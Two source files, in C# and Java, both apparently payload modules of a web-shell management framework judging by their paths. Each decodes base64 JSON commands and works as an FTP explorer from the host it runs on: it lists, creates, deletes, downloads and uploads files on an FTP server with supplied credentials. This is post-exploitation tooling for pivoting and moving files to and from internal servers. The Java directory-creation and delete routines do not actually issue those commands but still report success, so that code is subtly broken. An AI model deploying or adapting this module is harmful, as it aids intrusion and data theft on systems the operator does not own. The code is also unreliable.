File: Plugins/Manager/FTP/payloads/ASMX/NebulaPulsar/DarkMatter/payload.cs
using System;
using System.Text;
using System.Net;
using System.IO;
using System.Collections.Generic;
using System.Text.RegularExpressions;

public class payload
{
    public payload() { }

    public string Execute(object param)
    {
        try
        {
            if (!(param is Dictionary<string, object> mapParam))
            {
                return "[-] ERROR: Invalid parameter type. Expected Dictionary.";
            }
            
            if (!mapParam.TryGetValue("json", out var jsonValue) || string.IsNullOrEmpty(jsonValue?.ToString()))
            {
                return "[-] Missing parameter json";
            }

            string rawInput = jsonValue.ToString();
            string szJson = "";

            try
            {
                byte[] data = Convert.FromBase64String(rawInput);
                szJson = Encoding.UTF8.GetString(data);
            }
            catch
            {
                szJson = rawInput;
            }

            string host = GetJsonValue(szJson, "ip");
            if (string.IsNullOrEmpty(host)) host = "127.0.0.1";

            int port = 21;
            int.TryParse(GetJsonValue(szJson, "port"), out port);
            if (port <= 0) port = 21;

            string user = GetJsonValue(szJson, "user");
            string pass = GetJsonValue(szJson, "pass");
            string action = GetJsonValue(szJson, "action");
            string remotePath = GetJsonValue(szJson, "path");
            if (string.IsNullOrEmpty(remotePath)) remotePath = "/";

            int timeout = 10;
            int.TryParse(GetJsonValue(szJson, "timeout"), out timeout);
            if (timeout <= 0)
                timeout = 10;

            FtpExplorerManager manager = new FtpExplorerManager(host, port, user, pass, timeout);
            return manager.ProcessAction(action, remotePath, szJson);
        }
        catch (Exception e)
        {
            return "[-] ERROR: " + e.Message;
        }
    }

    private string GetJsonValue(string json, string key)
    {
        Match match = Regex.Match(json, $"\"{key}\"\\s*:\\s*\"(.*?)\"");
        if (match.Success) return match.Groups[1].Value;

        match = Regex.Match(json, $"\"{key}\"\\s*:\\s*([^,\\}}\\]]+)");
        if (match.Success) return match.Groups[1].Value.Trim().Replace("\"", "");

        return "";
    }
}

public class FtpExplorerManager
{
    private string host;
    private int port;
    private string user;
    private string pass;
    private int timeout;

    public FtpExplorerManager(string host, int port, string user, string pass, int timeout)
    {
        this.host = host;
        this.port = port;
        this.user = user;
        this.pass = pass;
        this.timeout = timeout > 0 ? timeout : 10;
    }

    public string ProcessAction(string action, string remotePath, string rawJson)
    {
        if (string.IsNullOrEmpty(action)) action = "list";

        switch (action.ToLower())
        {
            case "list":
                return ListDirectory(remotePath);
            case "mkdir":
                return MakeDirectory(remotePath);
            case "delete":
                return DeleteFileOrDir(remotePath);
            case "download":
            case "read":
                return DownloadFile(remotePath);
            case "upload":
                string fileContentBase64 = GetJsonValue(rawJson, "content");
                return UploadFile(remotePath, fileContentBase64);
            default:
                return "[-] ERROR: Unknown file explorer action.";
        }
    }

    private string ListDirectory(string remotePath)
    {
        string uriString = $"ftp://{host}:{port}{remotePath}";
        try
        {
            FtpWebRequest request = (FtpWebRequest)WebRequest.Create(uriString);
            request.Method = WebRequestMethods.Ftp.ListDirectoryDetails;
            request.Credentials = new NetworkCredential(user, pass);
            
            int timeoutMs = timeout > 0 ? timeout * 1000 : 10000;
            request.Timeout = timeoutMs;
            request.ReadWriteTimeout = timeoutMs;

            request.UsePassive = true;
            request.KeepAlive = false;
            request.EnableSsl = false;
            request.Proxy = null;

            using (FtpWebResponse response = (FtpWebResponse)request.GetResponse())
            using (StreamReader reader = new StreamReader(response.GetResponseStream(), Encoding.UTF8))
            {
                string content = reader.ReadToEnd();
                return $"[+] SUCCESS_LIST\n{content}";
            }
        }
        catch (Exception ex)
        {
            string innerMsg = ex.InnerException != null ? " -> " + ex.InnerException.Message : "";
            return $"[-] Failed to list directory {remotePath} -> {ex.Message}{innerMsg}";
        }
    }

    private string MakeDirectory(string remotePath)
    {
        string uriString = $"ftp://{host}:{port}{remotePath}";
        try
        {
            FtpWebRequest request = (FtpWebRequest)WebRequest.Create(uriString);
            request.Method = WebRequestMethods.Ftp.MakeDirectory;
            request.Credentials = new NetworkCredential(user, pass);
            request.Timeout = timeout > 0 ? timeout * 1000 : 10000;
            request.UsePassive = true;
            request.Proxy = null;

            using (FtpWebResponse response = (FtpWebResponse)request.GetResponse())
            {
                return $"[+] SUCCESS_MKDIR -> Directory created: {remotePath}";
            }
        }
        catch (Exception ex)
        {
            return $"[-] Failed to create directory {remotePath} -> {ex.Message}";
        }
    }

    private string DeleteFileOrDir(string remotePath)
    {
        string uriString = $"ftp://{host}:{port}{remotePath}";
        try
        {
            FtpWebRequest request = (FtpWebRequest)WebRequest.Create(uriString);
            request.Method = WebRequestMethods.Ftp.DeleteFile;
            request.Credentials = new NetworkCredential(user, pass);
            request.Timeout = timeout > 0 ? timeout * 1000 : 10000;
            request.UsePassive = true;
            request.Proxy = null;

            using (FtpWebResponse response = (FtpWebResponse)request.GetResponse())
            {
                return $"[+] SUCCESS_DELETE -> Removed: {remotePath}";
            }
        }
        catch (Exception ex)
        {
            return $"[-] Failed to delete {remotePath} -> {ex.Message}";
        }
    }

    private string DownloadFile(string remotePath)
    {
        string uriString = $"ftp://{host}:{port}{remotePath}";
        try
        {
            FtpWebRequest request = (FtpWebRequest)WebRequest.Create(uriString);
            request.Method = WebRequestMethods.Ftp.DownloadFile;
            request.Credentials = new NetworkCredential(user, pass);
            request.Timeout = timeout > 0 ? timeout * 1000 : 10000;
            request.UsePassive = true;
            request.Proxy = null;

            using (FtpWebResponse response = (FtpWebResponse)request.GetResponse())
            using (Stream responseStream = response.GetResponseStream())
            using (MemoryStream memoryStream = new MemoryStream())
            {
                responseStream.CopyTo(memoryStream);
                byte[] fileBytes = memoryStream.ToArray();
                string base64Data = Convert.ToBase64String(fileBytes);
                return $"[+] SUCCESS_DOWNLOAD\n{base64Data}";
            }
        }
        catch (Exception ex)
        {
            return $"[-] Failed to download file {remotePath} -> {ex.Message}";
        }
    }

    private string UploadFile(string remotePath, string base64Content)
    {
        string uriString = $"ftp://{host}:{port}{remotePath}";
        try
        {
            if (string.IsNullOrEmpty(base64Content))
            {
                return "[-] Failed to upload: File content is empty.";
            }

            byte[] fileBytes = Convert.FromBase64String(base64Content);

            FtpWebRequest request = (FtpWebRequest)WebRequest.Create(uriString);
            request.Method = WebRequestMethods.Ftp.UploadFile;
            request.Credentials = new NetworkCredential(user, pass);
            request.Timeout = timeout > 0 ? timeout * 1000 : 10000;
            request.UsePassive = true;
            request.Proxy = null;
            request.ContentLength = fileBytes.Length;

            using (Stream requestStream = request.GetRequestStream())
            {
                requestStream.Write(fileBytes, 0, fileBytes.Length);
            }

            using (FtpWebResponse response = (FtpWebResponse)request.GetResponse())
            {
                return $"[+] SUCCESS_UPLOAD -> File uploaded successfully: {remotePath}";
            }
        }
        catch (Exception ex)
        {
            return $"[-] Failed to upload file {remotePath} -> {ex.Message}";
        }
    }

    private string GetJsonValue(string json, string key)
    {
        Match match = Regex.Match(json, $"\"{key}\"\\s*:\\s*\"(.*?)\"");
        if (match.Success) return match.Groups[1].Value;

        match = Regex.Match(json, $"\"{key}\"\\s*:\\s*([^,\\}}\\]]+)");
        if (match.Success) return match.Groups[1].Value.Trim().Replace("\"", "");

        return "";
    }
}

File: Manager/FTP/payloads/CFM/NebulaPulsar(Java 11)/DarkMatter/payload.java
import java.io.*;
import java.net.URL;
import java.net.URLConnection;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class payload {

    public payload() { }

    public String Execute(Object param) throws Exception {
        try {
            if (!(param instanceof Map)) {
                return "[-] ERROR: Invalid parameter type. Expected Dictionary.";
            }

            Map<?, ?> mapParam = (Map<?, ?>) param;
            Object jsonValue = mapParam.get("json");
            if (jsonValue == null || jsonValue.toString().isEmpty()) {
                return "[-] Missing parameter json";
            }

            String rawInput = jsonValue.toString();
            String szJson = "";

            try {
                byte[] data = Base64.getDecoder().decode(rawInput);
                szJson = new String(data, StandardCharsets.UTF_8);
            } catch (Exception e) {
                szJson = rawInput;
            }

            String host = fnExtractJsonValue(szJson, "ip");
            if (host == null || host.isEmpty()) {
                host = "127.0.0.1";
            }

            int port = 21;
            try {
                String portStr = fnExtractJsonValue(szJson, "port");
                if (!portStr.isEmpty()) {
                    port = Integer.parseInt(portStr);
                }
            } catch (Exception ignored) {}

            if (port <= 0) {
                port = 21;
            }

            String user = fnExtractJsonValue(szJson, "user");
            String pass = fnExtractJsonValue(szJson, "pass");
            String action = fnExtractJsonValue(szJson, "action");
            String remotePath = fnExtractJsonValue(szJson, "path");
            if (remotePath == null || remotePath.isEmpty()) {
                remotePath = "/";
            }

            int timeout = 10;
            try {
                String timeoutStr = fnExtractJsonValue(szJson, "timeout");
                if (!timeoutStr.isEmpty()) {
                    timeout = Integer.parseInt(timeoutStr);
                }
            } catch (Exception ignored) {}

            if (timeout <= 0) {
                timeout = 10;
            }

            if (action == null || action.isEmpty()) action = "list";

            String lowerAction = action.toLowerCase();
            switch (lowerAction) {
                case "list":
                    return listDirectory(host, port, user, pass, timeout, remotePath);
                case "mkdir":
                    return makeDirectory(host, port, user, pass, timeout, remotePath);
                case "delete":
                    return deleteFileOrDir(host, port, user, pass, timeout, remotePath);
                case "download":
                case "read":
                    return downloadFile(host, port, user, pass, timeout, remotePath);
                case "upload":
                    String fileContentBase64 = fnExtractJsonValue(szJson, "content");
                    return uploadFile(host, port, user, pass, timeout, remotePath, fileContentBase64);
                default:
                    return "[-] ERROR: Unknown file explorer action.";
            }
        } catch (Exception e) {
            return "[-] ERROR: " + e.getMessage();
        }
    }

    private String fnExtractJsonValue(String json, String key) {
        String pattern = "\"" + key + "\"\\s*:\\s*\"?([^\",}]+)\"?";
        Pattern r = Pattern.compile(pattern);
        Matcher m = r.matcher(json);
        if (m.find()) {
            return m.group(1).trim();
        }
        return "";
    }

    private String listDirectory(String host, int port, String user, String pass, int timeout, String remotePath) {
        try {
            String userInfo = (user != null && !user.isEmpty()) ? user + ":" + (pass != null ? pass : "") + "@" : "";
            String uriString = "ftp://" + userInfo + host + ":" + port + remotePath;
            
            URL url = new URL(uriString);
            URLConnection conn = url.openConnection();

            int timeoutMs = timeout > 0 ? timeout * 1000 : 10000;
            conn.setConnectTimeout(timeoutMs);
            conn.setReadTimeout(timeoutMs);

            try (BufferedReader reader = new BufferedReader(new InputStreamReader(conn.getInputStream(), StandardCharsets.UTF_8))) {
                StringBuilder content = new StringBuilder();
                String line;
                while ((line = reader.readLine()) != null) {
                    content.append(line).append("\n");
                }
                return "[+] SUCCESS_LIST\n" + content.toString().trim();
            }
        } catch (Exception ex) {
            return "[-] Failed to list directory " + remotePath + " -> " + ex.getMessage();
        }
    }

    private String makeDirectory(String host, int port, String user, String pass, int timeout, String remotePath) {
        try {
            String userInfo = (user != null && !user.isEmpty()) ? user + ":" + (pass != null ? pass : "") + "@" : "";
            String uriString = "ftp://" + userInfo + host + ":" + port + remotePath;
            
            URL url = new URL(uriString);
            URLConnection conn = url.openConnection();
            int timeoutMs = timeout > 0 ? timeout * 1000 : 10000;
            conn.setConnectTimeout(timeoutMs);
            conn.setReadTimeout(timeoutMs);

            try (InputStream in = conn.getInputStream()) {
                return "[+] SUCCESS_MKDIR -> Directory created: " + remotePath;
            }
        } catch (Exception ex) {
            return "[-] Failed to create directory " + remotePath + " -> " + ex.getMessage();
        }
    }

    private String deleteFileOrDir(String host, int port, String user, String pass, int timeout, String remotePath) {
        try {
            String userInfo = (user != null && !user.isEmpty()) ? user + ":" + (pass != null ? pass : "") + "@" : "";
            String uriString = "ftp://" + userInfo + host + ":" + port + remotePath;
            
            URL url = new URL(uriString);
            URLConnection conn = url.openConnection();
            int timeoutMs = timeout > 0 ? timeout * 1000 : 10000;
            conn.setConnectTimeout(timeoutMs);
            conn.setReadTimeout(timeoutMs);

            try (InputStream in = conn.getInputStream()) {
                return "[+] SUCCESS_DELETE -> Removed: " + remotePath;
            }
        } catch (Exception ex) {
            return "[-] Failed to delete " + remotePath + " -> " + ex.getMessage();
        }
    }

    private String downloadFile(String host, int port, String user, String pass, int timeout, String remotePath) {
        try {
            String userInfo = (user != null && !user.isEmpty()) ? user + ":" + (pass != null ? pass : "") + "@" : "";
            String uriString = "ftp://" + userInfo + host + ":" + port + remotePath;
            
            URL url = new URL(uriString);
            URLConnection conn = url.openConnection();

            int timeoutMs = timeout > 0 ? timeout * 1000 : 10000;
            conn.setConnectTimeout(timeoutMs);
            conn.setReadTimeout(timeoutMs);

            try (InputStream responseStream = conn.getInputStream();
                 ByteArrayOutputStream memoryStream = new ByteArrayOutputStream()) {
                byte[] buffer = new byte[8192];
                int bytesRead;
                while ((bytesRead = responseStream.read(buffer)) != -1) {
                    memoryStream.write(buffer, 0, bytesRead);
                }
                byte[] fileBytes = memoryStream.toByteArray();
                String base64Data = Base64.getEncoder().encodeToString(fileBytes);
                return "[+] SUCCESS_DOWNLOAD\n" + base64Data;
            }
        } catch (Exception ex) {
            return "[-] Failed to download file " + remotePath + " -> " + ex.getMessage();
        }
    }

    private String uploadFile(String host, int port, String user, String pass, int timeout, String remotePath, String base64Content) {
        try {
            if (base64Content == null || base64Content.isEmpty()) {
                return "[-] Failed to upload: File content is empty.";
            }

            byte[] fileBytes = Base64.getDecoder().decode(base64Content);

            String userInfo = (user != null && !user.isEmpty()) ? user + ":" + (pass != null ? pass : "") + "@" : "";
            String uriString = "ftp://" + userInfo + host + ":" + port + remotePath;
            
            URL url = new URL(uriString);
            URLConnection conn = url.openConnection();

            int timeoutMs = timeout > 0 ? timeout * 1000 : 10000;
            conn.setConnectTimeout(timeoutMs);
            conn.setReadTimeout(timeoutMs);
            conn.setDoOutput(true);

            try (OutputStream requestStream = conn.getOutputStream()) {
                requestStream.write(fileBytes, 0, fileBytes.length);
                requestStream.flush();
            }

            try (InputStream in = conn.getInputStream()) {
                return "[+] SUCCESS_UPLOAD -> File uploaded successfully: " + remotePath;
            }
        } catch (Exception ex) {
            return "[-] Failed to upload file " + remotePath + " -> " + ex.getMessage();
        }
    }
}